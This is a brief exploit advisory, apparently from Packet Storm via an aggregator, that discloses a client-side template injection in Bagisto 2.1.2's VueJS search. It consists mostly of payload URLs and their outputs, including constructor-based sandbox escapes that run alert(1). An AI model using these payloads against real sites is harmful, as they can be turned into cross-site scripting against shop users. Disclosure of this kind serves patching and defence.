Bagisto 2.1.2 Client-Side Template Injection
2024-6-19 20:13:33 Author: packetstormsecurity.com(查看原文) 阅读量:5 收藏

# Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)
# Date: 06/18/2024
# Exploit Author: tmrswrr
# Vendor Homepage: https://forums.bagisto.com/
# Version: 2.1.2
# Tested on: https://demo.bagisto.com/

https://demo.bagisto.com/bagisto-common/search?query={{7*7}}

49

https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}

A

https://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}

[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]

> Payloads for VueJS 3

https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}
https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}

> You will be see alert button


文章来源: https://packetstormsecurity.com/files/179153/bagisto212-csti.txt
如有侵权请联系:admin#unsafe.sh